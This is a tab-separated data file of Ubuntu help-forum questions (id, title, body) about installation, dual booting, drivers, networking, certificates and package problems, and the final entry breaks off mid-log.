420805	how do i install mir ?	how do i install mir on ubuntu 12.10 ? can i use it side by side with x ? though this question is for ubuntu 12.10.you are still encouraged to give generic answers for all supported versions and distro 's if they are few and same .
420811	authentication failure ubuntuone	i suddenly got the file sync error ( auth failed ( auth_failed ) message on ubuntu 13.10 . it worked flawlessly for several months . i tried all methods reported in what should i do if authentication fails ? ( auth_failed state ) ubuntu one - sync error ubuntu one authentication failed i can connect ( so username and password are ok ) but it does n't sync . it says file sync in progress '' and `` getting information , please wait '' and that is all . later it says `` file sync is disconnected '' and still `` getting information , please wait so , where is the problem ?
420812	what is the correct location for a maintained virtualenv service ?	i will be installing and maintaining a python 2.7-based server application on ubuntu server ( 12.04 ) . the model of maintenance will be to create a virtualenv and install application standard libraries ( from pypi ) and custom libraries ( bespoke ) there , updating them as required . a separate folder holds the `` application '' , which is made up of configuration files and application-specific python files . as far as i can tell , the only ubuntu-provided packages i require are python and python-virtualenv . i may do a custom installation of pew to manage the venv - in which case i will sudo easy_install pew and accept that wherever it goes is correct ( pew is n't in the 12.04 repo ) . i have a vague awareness that applications should live in /opt or /srv or somewhere like that , and that a server application may live in a different location to a user application . give all that : where should the virtualenv be located ? where should the server application folder be located ?
420817	forward web request to another computer	i have one notebook and two servers : ip = 172.17.0.2 ( i have installed nginx here ) ip = 172.17.0.3 ( there is nothing here , but i can ping 172.17.0.2 from here ) i open browser on my notebook , open http : //172.17.0.2 and get web page from nginx . now i want to do something so , if i will open http : //172.17.0.3 in the browser this server forward my request 172.17.0.2 and return me same page back . i have connected to 172.17.0.3 and make this changes : root @ 6d2de436eef0 : / # sysctl net.ipv4.ip_forward=1 net.ipv4.ip_forward = 1 root @ 6d2de436eef0 : / # iptables -t nat -f prerouting root @ 6d2de436eef0 : / # iptables -t nat -a prerouting -d 172.17.0.3 -j dnat -- to-destination 172.17.0.2 root @ 6d2de436eef0 : / # iptables -f forward root @ 6d2de436eef0 : / # iptables -a forward -m conntrack -- ctstate established , related -j accept root @ 6d2de436eef0 : / # iptables -a forward -m conntrack -- ctstate new -d 172.17.0.2 -j accept root @ 6d2de436eef0 : / # iptables -p forward drop now i open http : //172.17.0.3 , but get nothing . why and how can i fix it ? update here is a result of tcpdump on 172.17.0.3 - http : //pastebin.com/47mrwqxy update 2 sorry , i gave you not full information . both servers 172.17.0.3 and 172.17.0.2 are docker containers . here is ifconfig on the host machine : $ ifconfig docker0 link encap : ethernet hwaddr fe:69 : ac:53:70:53 inet addr:172.17.42.1 bcast:0.0.0.0 mask:255.255.0.0 inet6 addr : fe80 : :f0ee:53ff : feae : aa6c/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:162525 errors:0 dropped:0 overruns:0 frame:0 tx packets:278054 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:10471915 ( 10.4 mb ) tx bytes:436185034 ( 436.1 mb ) eth0 link encap : ethernet hwaddr f0 : de : f1:27:7a : e6 inet addr:172.20.0.136 bcast:172.20.0.255 mask:255.255.255.0 inet6 addr : fe80 : :f2de : f1ff : fe27:7ae6/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:16023892 errors:0 dropped:0 overruns:0 frame:0 tx packets:4007904 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:8557520703 ( 8.5 gb ) tx bytes:484890281 ( 484.8 mb ) interrupt:20 память : f8500000-f8520000 eth1 link encap : ethernet hwaddr 82 : ea:96:9d:48:88 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b )
420818	problem booting live cd	i hope you are able to help me . i have tried to boot a live-cd with ubuntu 13.10 to my pc . ( packard bell , ms2384 ) . after loading for a while with the ubuntu logo on the screen , the screen goes white and then nothing happens i have changed the bios to legacy and switched off secure boot , so that part should be okay . i 'm looking forward to your help . all the best kristoffer
420822	installing ubuntu touch on lg 4x hd	gents , how can i install ubuntu touch on lg 4x hd and when it will be launched for all cell phones . thanks mohamed magdy
420826	no detected operating system	i am trying to install ubuntu alongside windows8 but while trying to do so it was showing as '' this computer currently has no detected operating system '' can i know whats wrong with this ? ? please help me in clearing out this problem . thanks in advance
420830	dual boot windows 8.1 and ubuntu 13.10 , unusable drive space	i have windows 8.1 ( 64-bit ) , i want to dual boot it with ubuntu 13.10 ( 64bit ) , i shrunk the c : drive by 20 gb . created a bootable pendrive and booted through it partitions when i clicked on `` something else '' , the 20gb data i have partitioned is showing `` unusable '' something else i tried using gparted its showing `` it is not possible to create more than 4 primary partitions '' please help , i am new to ubuntu my system specs : core i3 ( 3rd gen ) , 4gb ram , 500gb hdd , dell inspiron 14r i do not have enough reputation to upload images so i have given the links .
420833	colour surge in tvv when i connect laptop to tv	after recent updation , there is change in normal colour to colour surge and vice versa in tv when i connect my laptop to hdmi tv through hdmi cable .
420835	how to enable cpuset on ubuntu 12.04 ?	i have set up cpu sets with cset in ubuntu 12.04 , but they are not respected . processes just use all the cpu they can , no matter what set they are assigned to . it seems that cpuset is not enabled . how can i enable cpuset ?
420836	save changes on flash drive	i have my ubuntu installed on a flash drive . when doing any change to it , the changes are lost when booting . is there a way to save the changes on the usb ? thank you , fahd
420837	ubuntu crashes during installation on acer laptop	i just bought an accer aspire e1-522 with windows 8.1 processor : amd a6-5200 apu with radeon ( tm ) hd graphics 2.00ghz 12 gb ram i boot the disk , it starts installing ubuntu but it blanks and stops running this is what happens . please help me with this to install ubuntu , may be there is a bug for this computer , or some thing to make it work , but i do n't know how . thank you very much .
420840	problem downloading `` not free '' programs from ubuntu software center	i bought `` quick 'n easy web builder '' in ubuntu software center on 15 march , 2013 and it worked ok after unlocking it with my license key . now i have replaced my computer ( with ubuntu 12.04lts ) but i can not download the program anymore : when i try to start the download in ubuntu software center i invariably get the message : '' condizioni d'uso - unable to load page - problem occurred while loading the url https : //apps.ubuntu.com/cat/tos/plain/ - can not resolve proxy hostname ( ) '' . the same problem seem to happen with all paid programs , while i can download free ones without problems . thank you ! paolo
420841	testdisk says partition table structure is bad	i have a dual boot system , win7 and ubuntu 12.04 , a disk crash trashed my partition table . here is what fdisk says about the disk : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x16291629 device boot start end blocks id system /dev/sda1 2048 26626047 13312000 27 hidden ntfs winre /dev/sda2 * 26626048 26830847 102400 7 hpfs/ntfs/exfat /dev/sda3 26830848 543512242 258340697+ 7 hpfs/ntfs/exfat /dev/sda4 543512574 976771071 216629249 5 extended /dev/sda5 959127552 976771071 8821760 82 linux swap / solaris testdisk finds the partition , however if i make the linux partition logical , testdisk says the table structure is bad . any suggestions ? i have attached a screenshot of the testdisk screen : oops , it appears that i flagged the wrong ntfs partition as bootable in testdisk .
420845	no sound in kubuntu 13.10 ( pulseaudio headphone detection problem ? )	sound has stopped working a few days ago in my kubuntu 13.10 , for a reason i do n't understand . hours of digging the internet did not help me find a solution ... here is information i can provide : my sound card is connected and working ( the meter in pavucontrol shows something when i play a sound , pacmd list-sinks also says it 's running in that case ) pacmd list-sinks says that the availability of my speakers is unknown and that of my headphones is no , and this does not change when i plug / unplug the headphones . might that be the problem ? if that helps , i have just realized that the microphone is not detected ( again the meter in pavucontrol shows nothing when i make noise ) . looks like somehow the connection in lost between the sound card and its actual i/o . i 'm running kubuntu 13.10 ( 3.11.0-15-generic 64-bit ) on a hp elitebook 2570p , the sound card is : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) i do n't know what exactly made the sound stop working ( update kernel from 3.11.0-14 to 3.11.0-15 ? i have tried to boot on 3.11.0-14 , i have no sound either ) . until a few days ago everything was working great , i had sound both in speakers and headphones , headphones were detected when plugged in and this switched off the speakers , etc . in case it helps , here is some more information ( from the script alsa-info.sh ) . thanks a lot by advance for your help ! to anyone arriving on this thread , in the end it turned out that in my case it was a hardware problem . i checked by installing windows : there was no sound there either . then i called the hp assistance , and after they changed the mother board sound was working again .
420847	dual booting ubuntu 13.10 and win 8 problems	before i begin : i have read many of the questions and solutions available here and on other sites to no avail . i hope i am not asking a duplicate question , but i am an admitted linux novice . my goal : dual boot windows 8 & ubuntu 13.10 with uefi/secure boot enabled . i want to retain windows master boot record as first boot record and have grub installed on same 'drive ' as ubuntu . i am attempting to dual boot on a hp m7-j010dx . i created a live usb of ubuntu 13.10 . the only way i could get the live session to run was by disabling secure boot , the windows fast start option , and running with uefi disabled ( legacy or `` cms '' mode ) . i installed from the live session . as expected , there was no option to choose os when i restarted . the computer boots directly to windows . from within windows , i edited the master boot record to include an entry for ubuntu with easybcdedit 2.2 . i choose the appropriate partition ( sda7 in my case ) the appropriate boot loader ( grub 2 ) and made the entry . when i restarted windows , i was given the blue uefi 'choose os ' screen . both options were available . windows boots fine from this screen . however , when i choose ubuntu , i am immediately directed to an error screen that reads : '' windows failed to start . a recent hardware or software change might be the case ... '' with the following error : `` status : 0xc000007b '' i 've researched the error and understand what it means . i have tried numerous combinations for the ubuntu entry in the master boot record . no luck . one thing i suspect may be the issue is that i had to install ubuntu in legacy mode . i have read several solutions involving boot-repair . however , if i understand correctly , this will make grub the first boot option and wipe out my windows master boot record . any help would be appreciated . thank you .
420848	problem with wifi connection on compaq610 with ubuntu12.04	i 'm a new user , i just installed ubuntu12.04 but for some reason i ca n't use the wifi connection . when i enable the wireless network i get this message on the terminal **feb 14 14:22:04 ubuntu networkmanager [ 947 ] : wifi hardware radio set enabled feb 14 14:22:07 ubuntu kernel : [ 6668.852125 ] b43-phy0 : radio hardware status changed to enabled feb 14 14:22:07 ubuntu networkmanager [ 947 ] : wifi now enabled by radio killswitch feb 14 14:22:07 ubuntu networkmanager [ 947 ] : ( wlan0 ) : bringing up device . feb 14 14:22:07 ubuntu kernel : [ 6669.040119 ] b43-phy0 : loading firmware version 478.104 ( 2008-07-01 00:50:23 ) feb 14 14:22:13 ubuntu kernel : [ 6674.561046 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready feb 14 14:22:13 ubuntu networkmanager [ 947 ] : ( wlan0 ) : supplicant interface state : starting - > ready feb 14 14:22:13 ubuntu networkmanager [ 947 ] : ( wlan0 ) : device state change : unavailable - > disconnected ( reason 'supplicant-available ' ) [ 20 30 42 ] feb 14 14:22:13 ubuntu networkmanager [ 947 ] : ( wlan0 ) : supplicant interface state : ready - > inactive** any clue ? as soon as i installed it i lost the driver for the wifi , but after downloading them again i still do n't have access to the wifi network .
420851	shutter is running , but i do n't see it	i installed shutter yesterday , and it worked great , but i could n't get it to run today . so i looked around askubuntu , and installed the dependencies i was missing and that still did n't solve my problem . then i type shutter in the terminal , i get info : there is already another instance of shutter running ! . i do n't see it anywhere and it 's not marked as running in my sidebar . i tried uninstalling and reinstalling , purging and installing through the terminal , but nothing helped , i still get the same problem . i am using ubuntu 12.04
420852	update-manager crashes with undefined symbol ( libpyglib-gi-2.0-python2.7.so )	when i lauch the software updater from the app launcher 's icon , it crashes , runing it from the command line shows what the error is : i 've been getting this since 12.10 , and it 's still present on 13.10 max @ max-ubuntu : ~ $ update-manager traceback ( most recent call last ) : file `` /usr/bin/update-manager '' , line 28 , in < module > from gi.repository import gtk file `` /usr/lib/python2.7/dist-packages/gi/__init__.py '' , line 27 , in < module > from ._gi import _api , repository importerror : /usr/lib/x86_64-linux-gnu/libpyglib-gi-2.0-python2.7.so.0 : undefined symbol : _py_zerostruct error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/apport_python_hook.py '' , line 64 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes file `` /usr/lib/python2.7/dist-packages/apport/__init__.py '' , line 5 , in < module > from apport.report import report file `` /usr/lib/python2.7/dist-packages/apport/report.py '' , line 30 , in < module > import apport.fileutils file `` /usr/lib/python2.7/dist-packages/apport/fileutils.py '' , line 23 , in < module > from apport.packaging_impl import impl as packaging file `` /usr/lib/python2.7/dist-packages/apport/packaging_impl.py '' , line 20 , in < module > import apt file `` /usr/lib/python2.7/dist-packages/apt/__init__.py '' , line 21 , in < module > import apt_pkg importerror : /usr/lib/python2.7/dist-packages/apt_pkg.so : undefined symbol : _py_zerostruct original exception was : traceback ( most recent call last ) : file `` /usr/bin/update-manager '' , line 28 , in < module > from gi.repository import gtk file `` /usr/lib/python2.7/dist-packages/gi/__init__.py '' , line 27 , in < module > from ._gi import _api , repository importerror : /usr/lib/x86_64-linux-gnu/libpyglib-gi-2.0-python2.7.so.0 : undefined symbol : _py_zerostruct max @ max-ubuntu : ~ $
420855	how to create a hdr file from set of image files ?	i have many jpeg image files for the same scene with different exposure setting . how to create hdr file using them in ubuntu 12.04amd64 .
420857	search and download audio-only from youtube	is there a way to search and then download from youtube , with the stipulation that i only need to download the audio only , not the video .
420858	how to use free -m to get memory usage for all users	i typed the free command to get the memory usage as follows : free -m output : i want to use this command to get the same info but for all users for example : i used this command .. because it easy for me .. to store its output in a variables in a bash scrip ...
420860	problem with certificates	hu guys ! for years i solved every problem that i 've had with ubuntu with google , forums and irc , but i found one that i ca n't pass through . i 'm with problems with ca-certificates , every site that i try to access ask me for a confirmation of the certification and my update is not working 100 % too . i really apreciate any help . jyulliano @ salamander : ~ $ sudo rm -rf /etc/ssl/certs/* jyulliano @ salamander : ~ $ sudo update-ca-certificates updating certificates in /etc/ssl/certs ... 152 added , 0 removed ; done . running hooks in /etc/ca-certificates/update.d ... .done . jyulliano @ salamander : ~ $ sudo apt-get update [ ... ] err private-ppa.launchpad.net precise/main amd64 packages server certificate verification failed . cafile : /etc/ssl/certs/ca-certificates.crt crlfile : none err private-ppa.launchpad.net precise/main i386 packages server certificate verification failed . cafile : /etc/ssl/certs/ca-certificates.crt crlfile : none ign private-ppa.launchpad.net precise/main translation-en_us ign private-ppa.launchpad.net precise/main translation-en fetched 1,118 kb in 44s ( 24.9 kb/s ) e : some index files failed to download . they have been ignored , or old ones used instead .
420863	hp pavilion 10 ts notebook pc black screen	today i got a laptop for school work , a hp 10-e004au . i 'm installing ubuntu 12.04.4 on it the problem is during and post installation . during installation i have to boot with the nomodeset command else i get no graphics and the monitor turns off , backlight and all . once i bypassed this i managed to install ubuntu and then tried to boot up , this failed and so i tried rebooting with the nomodeset command active , after doing this ubuntu starts loading correctly without errors until the loading screen finishes , once it finished the screen turns black for a second ( backlight ) and after a small pause turns off completely . i have tried running 13.10 and it presented the same issue , after doing some research it would lead me to believe its the graphics however it has no graphics card , it uses onboard . specs : amd a4-1200 with radeon ( tm ) hd graphics @ 1000mhz 2gb of ram it came preinstalled with windows 8.1
420865	kiosk mode for 13.10	i cant get the kiosk mode to work 13.10 . i tried using the instructions for 12.04 - setting up ubuntu as a kiosk web appliance - but it does n't work . there is no log in screen settings on 13.10 like it ask you to do in step 7 .
420866	printer set-up in ubuntu13.10 : printer can not create temporary file	i recently upgraded a system from 12.4 to 13.10 . laserjet 4p printer connect to lpt1 was working under 12.04 , now when i send even test page to printer , job comes up in the printer queue but is stopped . when get details , it states that : ca n't create temporary file what i do n't have sufficient information to troubleshoot . any and all assistance is welcome .
420867	calibrate touch screen permanently	i have a usb touchscreen and a calibration app , but whenever the usb gets bumped it uncalibrates . is there a way to permanently calibrate it ?
420870	temperature & ram monitoring script	i have the following script : while : do clear ; echo `` -- -- -- -- -- -- -- -- -- -- -- -- -- -ram load -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- $ free -mt > > memory.txt ; free -mt ; echo `` -- -- -- -- -- -- -- -- -- -- -- -- -- -temperature -- -- -- -- -- -- -- -- -- -- -- -- -- - $ sensors > > temp.txt ; sensors ; sleep 1 ; clear ; done which gets the current system ram and temperature and writes it to two files , respectively memory.txt and temp.txt i want to use this data on a webserver with dygraphs what is the best way to clean up the data , because it gives these two file : memory.txt temp.txt for the ram part i only want the -/+ buffers/cache : line and from the temperature part only the temperatures .
420871	control mouse with classic controller joystick in wminput/cwiid	i have installed wmgui and cwiid . i am attempting to get it set up for gaming , so i want the right joystick to control the mouse , and the left to control key_w , key_a , key_s , and key_d . i have tried the following in /etc/cwiid/wminput/buttons : classic.rstick.x = rel_x classic.rstick.y = rel_y but it just sticks the mouse in the bottom-right corner of the screen , unmovable . how would i make it actually move the mouse , and have the lstick move w , a , s , and d ? edit : using ubuntu 13.10 , not 13.04
420876	connecting to the internet using etisalat in sri lanka ( prolink phs300 ) ( corporate dongle )	i live in sri lanka and my isp is etisalat lanka pvt ( ltd ) . i upgrade to ubuntu 14.04 a couple of weeks ago and i still am wondering how to connect to the internet using my etisalat prolink phs300 dongle . i have tried many online forums as well as sakis3g but all of them are telling that they failed to connect . i got a 1kbps connection on the first day , and when i restarted my computer , it did not connect at all . in the inbuilt cd-rom of the dongle there is some software but it will not install without wvdial and qt3 . i do not have another internet connection . i am dual-booting ubuntu with windows xp sp3 . i have been using it with windows for a long time with no problems , whatsoever . as soon as i tried to connect normally , it says `` network is disconnected '' my apn is `` ebb '' and my dial-up number is *99 # i have tried installing wvdial offline and it asks for some more expectancies such as a. libxplc ; b. libwvstreams-base ; c. libwvstreams-extras ; d. libuniconf ; . d. libaudio2 ; e. libqt3-mt . sakis3g gave me a ray of hope but did not work . i would appreciate any help provided . i hope my problem will be solved because i really like ubuntu and would n't like to give up on it just because it ca n't connect to the internet . my version of windows is getting outdated and it is too expensive to upgrade and i do n't want to use pirated versions . thanks in advance , sanoo
420880	recovering data from previous ubuntu install	i had hard drive issues on my dual boot xp/ubuntu machine , i replaced the hard drives and i am trying to find data from my old ubuntu install in the old drive , but i can not find my file directory at all , where in the ubuntu install is my data stored ?
420881	view complete list of ports open and closed	when a port shows up in nmap or netstat i know its open and listening . but thing is , how do i know what other ports are actually open on my server , even though they may not be listening right now ? how can i view a complete list of all ports that are actually enabled even though they may not be listening or being used right now ? i 'd like to shut down those , so not one can exploit them . right now , there 80 and that 's apache . what others are actually there but not being displayed . i 'm on a vps like aws .
420883	keyboard and mouse only work in recovery mode	as my title says if i just try to boot up like normal then my keyboard and mouse do not work and so i can not login . if instead i choose recovery mode and then immediately tell it to resume boot like normal then everything works like normal . does anyone know what could possibly cause this ?
420885	backup files and folders on qnap ts-421	i have a ubuntu 12.04 desk that i use as a file server , i have a qnap turbo nas ts-421 that i 'd like to use as a backup destination . i 've enabled smb , nfs , ftp , and ssh and the firmware is the latest one . i already tried ssh with the scp command , but the only account available to connect to the box is admin , and i could n't find the correct path to the shared folders neither . i need to use other accounts rathern than admin . can somebody help me out to make a crontab job that would save everyday my documents folder without me being there doing things manually ? qnap has rsync server service , ... i did n't succed to make it work as most of the documentation shows only how to sync two qnap nas remotely.. can somebody give me some hints ? thanks ! emanuele
420888	unity will not work after upgrading from 12.04 to 12.10	last night , i updated from ubuntu 12.04 to 12.10 . this morning , i logged in to my computer , only to get a black screen . i am able to access the shell by pressing the escape key while the ubuntu logo shows , but i can not use any desktop environments ( gnome , unity , et al . ) i received an error about there being no screens in xorg- i uninstalled xorg ( a stupid idea ? ) and attempted to reinstall it , only to find that the current xorg package is broken . one thing that may be helpful- when i hit ctrl+alt+f7 , my startup programs run , suggesting that the only thing really wrong is my desktop . i run boinc ( which heats my computer up significantly ) , and i can physically tell it is running . i have backups of all my files , but i have spent a lot of time and energy getting everything the way i want . thanks to anyone who can help- i have spent ( wasted ) about 4 hours trying to fix this . it could be there is a simple solution to this , but i ca n't find it . pardon my ignorance . edit : i am running a 64-bit lenovo thinkpad x230 . according to lspci -nn | grep vga i have a intel corporation 3rd gen core processor graphics controller . i am able to get tty sessions 1-7 , but just ca n't make unity ( or any other graphical interface ) work . i gave up trying to fix this and reinstalled , which actually worked out ok ( though i lost pretty much the whole day in terms of working time ) . i still have the install , though and would like to see everything work .
420891	docky not showing up in the task manager ?	docky is frozen , but i ca n't find it in the task manager . how do i kill it ?
420896	where is the script/binary for `` send to > mail recipient '' located ?	when you right click a file in xubuntu , you get an option send to > mail recipient ( and i know ubuntu has the same feature , but it may have a different title in the context menu ) . what command is executed when you choose this option ? is it an editable shell/bash script , or a compiled binary ?
420898	how to check if overheating protection is working	hey my thinkpad t410i gets very hot . during load system temp goes up to 90째 and the fan runs at 4500 rpm . how can i check if overheating protection is working ? how critical is this temperature ? thanks !
420900	console when ubuntu starts up	when i start ubuntu up a purple screen pops up and then disapears again then a window comes up that says that i am running in low graphics mode . i click ok and then all i see is a black console . how do i get into the normal ubuntu ?
420903	do-release-upgrade and tlp ( and other optimizations )	so it is that time again . the time to do a release upgrade because the latest version is reaching it 's eol . this time it 's a bit different though . this time i 've got a laptop which i 've optimized using tlp with my own config file as to reach even more battery time ( i 've got over 12 hours of battery time which i occasionally have to use in the name of science ) . i 've also installed bumblebee with the bumblebee indicator ( since i 'm using a optimus graphical card ) . now my normal approach to a release upgrade was to put all the files i could n't do without and just make a clean install . this time however i would like to keep my optimizations . my questions is : will i lose my optimizations when i do a release update ( aka . will i have to re-install bumblebee ( and it 's indicator ) and tlp as well as there config settings ) ? slightly unrelated : will i have to re-install all third party software or are the repository 's just disabled for the upgrade but the software not uninstalled ?
420904	wired connection is n't connecting to internet	i have a pc computer installed with ubuntu 12.4.4 ( no other os ) that is wired directly to the router . router ( ae1000 ) and modem working , have a laptop running ubuntu and is connected to router through a wire and working flawlessly . the pc is a 1 terabyte machine with more then 10gig of ram the wired connection is set to auto on ipv4 and ipv6 . the network port on the machine ( ethernet ) is directly built into the motherboard ( it is not a separate card ) sis900 . ubuntu is getting all network information automatically but when i run checks there are two different error messages `` destination host unreachable '' and something about the not being on the network . all the information on the gui side is correct . the installation on this machine has been particularly difficult and i have spent several days in overcoming many problems faced . the system is working great expect for this one caveat . step by step works best for me , this way i can be methodical in my approach .
420906	ubuntu 13.10 bootable usb shows black screen with blinking cursor only	i used this universal usb installer and ubuntu-13.10-desktop-i386.iso ( md5 verified ) http : //www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/ but all i get is black screen with cursor blinking after bios 's init texts . yes , i 've enabled boot from usb in bios . also used ultra iso to create a bootable usb for ubuntu . i get some `` syslinux ... '' message and nothing more . my specs are : intel dual core e5200 overclocked to 4.16 ghz gigabyte ep45-ds3l asus gtx660 video card 2 hard drives and ddr2 800 mhz 4 gb windows xp , 7 , 8.1 , kubuntu 9 x86 ( does n't work any more ) are all installed on this computer on different drives . kubuntu probably stopped working after i changed video card from ati to nvidia . i can boot from an old kubuntu 9 x86 live dvd . how do i make it to work ? should i start dancing with buben ?
420907	mac mini 2007 ubuntu 32 or 64 bit	i 'm installing ubuntu server on a 2007 mac mini . according to the specs it 's 64bit but i have tried to install the 64bit server version and it hangs on boot . same thing happens with fedora x64 version . i just downloaded the 32 bit version and it works fine . installing as i type this . so why does it hang on cd star up / flash thumb drive too . i get a black screen then text that says select cd rom boot type and options to choose 1 or 2 . i am unable to use my keyboard at that stage or hit enter .
420910	openjdk 7 installation trouble on 10.04	i added the following common personal package archive as follows : sudo add-apt-repository ppa : openjdk/ppa sudo apt-get update the update goes well , but when i try to install the openjdk-7-jdk it stops with an unmet dependency on the openjdk-7-jre . so , not sure what is going on , i chase the unmet dependencies down to these two ( note : lib depends on headless ) , so i try to install them together : $ sudo apt-get install openjdk-7-jre-lib openjdk-7-jre-headless ... the following packages have unmet dependencies : openjdk-7-jre-headless : conflicts : openjdk-7-jre-lib ( < 7b89~pre1-0 ) but 7~b117~pre1-0lucid1 is to be installed openjdk-7-jre-lib : depends : openjdk-7-jre-headless ( > = 7b89~pre1 ) but 7~b117~pre1-0lucid1 is to be installed conflicts : openjdk-7-jre-headless ( < 7b89~pre1-0 ) but 7~b117~pre1-0lucid1 is to be installed e : broken packages now , i 'm really lost . does anyone know what is going on ?
420913	why is there a size discrepancy between hfs+ and ext4 ?	i recently set up an nfs server on my ubuntu server and i 'm currently in the process of migrating my files from hfs+ hdds to ext4 . i 've run into a problem however where the receiving disk ( ext4 format ) is running out of space before the transfer is complete . both drives are 2 tb external usb drives and the receiving drive was newly formatted so there should n't have been anything on it . i 'm aware that the default block size for ext4 is 4k and , as expected , comparing du /media/ [ receiving drive ] /* du -- apparent-size /media/ [ receiving drive ] /* shows that most ( if not all ) files are using an additional 4k on the disk . the hfs+ drive , which i 've unfortunately already formatted to ext4 so i wo n't be able to get any info on , had a little over 12 gb of free space however based on current usage of the ext4 disk and the amount of files i 've already transferred over , i 'm missing over 200 gb of space ! i have absolutely no idea where this discrepancy is coming from because at most the addition of 4k to every single file would be significantly less than 1 gb , much less 200 . both drives are now formatted as ext4 with a guid partition table and diskutility shows that there 's a ~700mb difference in capacity between them ( another mystery ) . suffice it to say , i 'm stuck . any suggestions ?
420915	dual boot with windows 8 and heating	i have a laptop , model : hp dv6 6116tx . its an entertainment laptop . it works with windows 7 but i upgraded to windows 8 . now i am willing to use ubuntu for my final year project as it is easy to do on the linux platform . the problem is that as soon as i install ubuntu and my laptop is not uefi enabled but windows stops booting and if i am using ubuntu the heat it gives out is so much that i have to shut it down in order to cool it up or i have go in an air conditioned room to work on my laptop .
420917	how can i replace upstart with systemd ?	since mark shuttleworth decided to switch to sytemd in the future , i was wondering if i can install it on my ubuntu now ?
420919	amd catalyst on hdtv 720p	i have an amd a8-5500 system . when i set it up , it was on a small monitor with a 1366x768,60 video setting . i moved the system to my living room and attached it to my secptre hdtv . i connected both the vga and hdmi connectors to the tv . on both inputs i got a blank screen with a no support message . when i booted the system with a usb stick with the try/install options , both inputs worked with the open source driver . the vga was limited to 1024x768 , though . after trying different things such as removing and re-installing the catalyst driver in terminal mode , i discovered that the catalyst driver would only work when the vga plug was physically disconnected from the computer . if i connected it while running the screen would go blank with the no support message as soon as i used either amdcccle or system setting to attempt to configure the vga output . is the problem with the tv ?
420922	what languages does ubuntu support ?	i am planning to buy a ( hopefully , inexpensive - i 'm poorer than i used to be ) linux laptop to replace my mac laptop . i 'd like to be able to write & compile/interpret programs in c/c++ , python , sql , and r. does ubuntu have/support all of these ? might it be better to just buy a windows laptop and then download cygwin ? i 'd like to get ubuntu , but i worry about cost .
420924	key x not found or not valid with xubuntu , enigmail and thunderbird	i try to run gnupg with enigmail and thunderbird . at first it seems that everything runs perfectly : i am able to encrypt / decrypt files . only thunderbird with enigmail does n't work . i always get the error : key x not found or not valid . the ( sub- ) key might have expired . my key is - of course - valid and not expired . it works if i start thunderbird as root , but all rights of the files seems ok. am i missing something ?
420927	ubuntu 13.10 internet problems - also with 12.04 lts	just installed 13.10 on a new build , and i 'm having a few issues . the main one being with internet . my motherboard has a realtek ethernet adapter built in , and while it does connect , it does not get an ip address , nor can it ping the router . secondly , my wifi adapter ( tp-link wdn4800 ) can see the wireless networks , and on connection prompts for a password , it never actually connects . i can connect to the router both with wired and wireless from other machines in my house , and i have tried manually assigning ip addresses in case that was the issue . i have also tried the fix suggested here : http : //www.linux-hardware-guide.com/ca/2012-11-01-tp-link-tl-wdn4800-wireless-n-dual-band-pcie-450mbps with no luck . at present i am connected to the wifi via my iphone ( usb ) . would appreciate any help . i enjoy ubuntu once it 's working , but setting it up is proving to be a real pain . edit : also tried 12.04 lts - both issues are present here too . edit 2 - running dmesg | grep -e 'cfg|ath|wlan ' gives : [ 835.322749 ] ath : phy0 : failed to stop tx dma , queues=0x001 ! [ 836.295689 ] wlan0 : authenticate with 08:76 : ff : c8:67 : d0 [ 836.303592 ] wlan0 : direct probe to 08:76 : ff : c8:67 : d0 ( try 1/3 ) [ 836.507237 ] wlan0 : direct probe to 08:76 : ff : c8:67 : d0 ( try 2/3 ) [ 836.711325 ] wlan0 : direct probe to 08:76 : ff : c8:67 : d0 ( try 3/3 ) [ 836.915507 ] wlan0 : authentication with 08:76 : ff : c8:67 : d0 timed out [ 837.344859 ] ath : phy0 : dma failed to stop in 10 ms ar_cr=0x00000024 ar_diag_sw=0x02000020 dmadbg_7=0x00026800 [ 837.516237 ] ath : phy0 : failed to stop tx dma , queues=0x001 ! [ 837.580301 ] ath : phy0 : failed to stop tx dma , queues=0x001 ! [ 837.592172 ] ath : phy0 : dma failed to stop in 10 ms ar_cr=0x00000024 ar_diag_sw=0x02000020 dmadbg_7=0x00026800 [ 837.592205 ] ath : phy0 : could not stop rx , we could be confusing the dma engine when we start rx up [ 837.656339 ] ath : phy0 : failed to stop tx dma , queues=0x001 ! [ 837.668245 ] ath : phy0 : dma failed to stop in 10 ms ar_cr=0x00000024 ar_diag_sw=0x02000020 dmadbg_7=0x00026800 [ 837.668280 ] ath : phy0 : could not stop rx , we could be confusing the dma engine when we start rx up [ 837.732029 ] ath : phy0 : failed to stop tx dma , queues=0x001 ! [ 837.743565 ] ath : phy0 : dma failed to stop in 10 ms ar_cr=0x00000024 ar_diag_sw=0x02000020 dmadbg_7=0x00006400 [ 837.743587 ] ath : phy0 : could not stop rx , we could be confusing the dma engine when we start rx up [ 837.808400 ] ath : phy0 : failed to stop tx dma , queues=0x001 ! [ 837.820465 ] ath : phy0 : dma failed to stop in 10 ms ar_cr=0x00000024 ar_diag_sw=0x02000020 dmadbg_7=0x00024e00 [ 837.820501 ] ath : phy0 : could not stop rx , we could be confusing the dma engine when we start rx up [ 837.884470 ] ath : phy0 : failed to stop tx dma , queues=0x001 ! [ 837.896318 ] ath : phy0 : dma failed to stop in 10 ms ar_cr=0x00000024 ar_diag_sw=0x02000020 dmadbg_7=0x00006400 [ 837.896354 ] ath : phy0 : could not stop rx , we could be confusing the dma engine when we start rx up [ 837.960517 ] ath : phy0 : failed to stop tx dma , queues=0x001 ! [ 837.972402 